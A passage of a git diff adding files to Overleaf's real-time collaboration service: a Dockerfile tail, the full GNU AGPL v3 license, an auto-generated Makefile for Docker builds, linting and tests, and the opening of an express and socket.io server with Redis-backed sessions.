https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/real-time/package.json /overleaf/services/real-time/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/real-time/ /overleaf/services/real-time/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/real-time/LICENSE b/services/real-time/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/services/real-time/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/real-time/Makefile b/services/real-time/Makefile new file mode 100644 index 0000000..e9e6a7a --- /dev/null +++ b/services/real-time/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = real-time +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/real-time/app.js b/services/real-time/app.js new file mode 100644 index 0000000..38cb3ca --- /dev/null +++ b/services/real-time/app.js @@ -0,0 +1,340 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const async = require('async') + +const logger = require('@overleaf/logger') +logger.initialize('real-time') +Metrics.event_loop.monitor(logger) +Metrics.open_sockets.monitor() + +const express = require('express') +const session = require('express-session') +const redis = require('@overleaf/redis-wrapper') + +const sessionRedisClient = redis.createClient(Settings.redis.websessions) + +const RedisStore = require('connect-redis')(session) +const SessionSockets = require('./app/js/SessionSockets') +const CookieParser = require('cookie-parser') + +const DrainManager = require('./app/js/DrainManager') +const HealthCheckManager = require('./app/js/HealthCheckManager') +const DeploymentManager = require('./app/js/DeploymentManager') + +const Path = require('node:path') + +// NOTE: debug is invoked for every blob that is put on the wire +const socketIoLogger = { + error(...message) { + logger.debug({ fromSocketIo: true, originalLevel: 'error' }, ...message) + }, + warn(...message) { + logger.debug({ fromSocketIo: true, originalLevel: 'warn' }, ...message) + }, + info() {}, + debug() {}, + log() {}, +} + +// monitor status file to take dark deployments out of the load-balancer +DeploymentManager.initialise() + +// Set up socket.io server +const app = express() + +const server = require('node:http').createServer(app) +server.keepAliveTimeout = Settings.keepAliveTimeoutMs +const io = require('socket.io').listen(server, { + logger: socketIoLogger, +}) + +// Bind to sessions +const sessionStore = new RedisStore({ client: sessionRedisClient }) + +if (!Settings.security.sessionSecret) { + throw new Error('No SESSION_SECRET provided.') +} + +const 